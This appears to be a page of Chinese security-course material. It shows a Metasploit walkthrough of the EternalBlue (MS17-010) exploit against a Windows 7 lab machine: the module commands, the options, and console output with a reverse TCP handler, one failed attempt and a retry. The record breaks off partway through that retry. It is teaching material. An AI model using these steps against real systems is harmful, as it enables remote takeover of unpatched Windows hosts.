MS17-010 (EternalBlue)
"EternalBlue" exploitation
Kali Linux  ->  Windows 7
msf > search ms17_010
msf > use exploit/windows/smb/ms17_010_eternalblue 
msf exploit(ms17_010_eternalblue) > show options 
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Section: 拼客学院安全公开课, page 1
Exploit target:
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > set RHOST 172.16.70.212
RHOST => 172.16.70.212
msf exploit(ms17_010_eternalblue) > show options 
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               172.16.70.212    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Exploit target:
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > show targets 
Exploit targets:
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > exploit 
[*] Started reverse TCP handler on 172.16.70.216:4444 
[*] 172.16.70.212:445 - Connecting to target for exploitation.
[+] 172.16.70.212:445 - Connection established for exploitation.
[+] 172.16.70.212:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.70.212:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.70.212:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 172.16.70.212:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 172.16.70.212:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 172.16.70.212:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.70.212:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.70.212:445 - Sending all but last fragment of exploit packet
[*] 172.16.70.212:445 - Starting non-paged pool grooming
[+] 172.16.70.212:445 - Sending SMBv2 buffers
[+] 172.16.70.212:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.70.212:445 - Sending final SMBv2 buffers.
[*] 172.16.70.212:445 - Sending last fragment of exploit packet!
[*] 172.16.70.212:445 - Receiving response from exploit packet
[+] 172.16.70.212:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.70.212:445 - Sending egg to corrupted connection.
[*] 172.16.70.212:445 - Triggering free of corrupted buffer.
[-] 172.16.70.212:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.70.212:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.70.212:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.16.70.212:445 - Connecting to target for exploitation.
[+] 172.16.70.212:445 - Connection established for exploitation.
[+] 172.16.70.212:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.70.212:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.70.212:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 172.16.70.212:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 172.16.70.212:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 172.16.70.212:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.70.212:445 - Trying exploit with 17 Groom Allocations.
[*] 172.16.70.212:445 - Sending all but last fragment of exploit packet
[*] 172.16.70.212:445 - Starting non-paged pool grooming
[+] 172.16.70.212:445 - Sending SMBv2 buffers
[+] 172.16.70.212:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.70.212:445 - Sending final SMBv2 buffers.
[*] 172.16.70.212:445 - Sending last fragment of exploit packet!
[*] 172.16.70.212:445 - Receiving response from exploit packet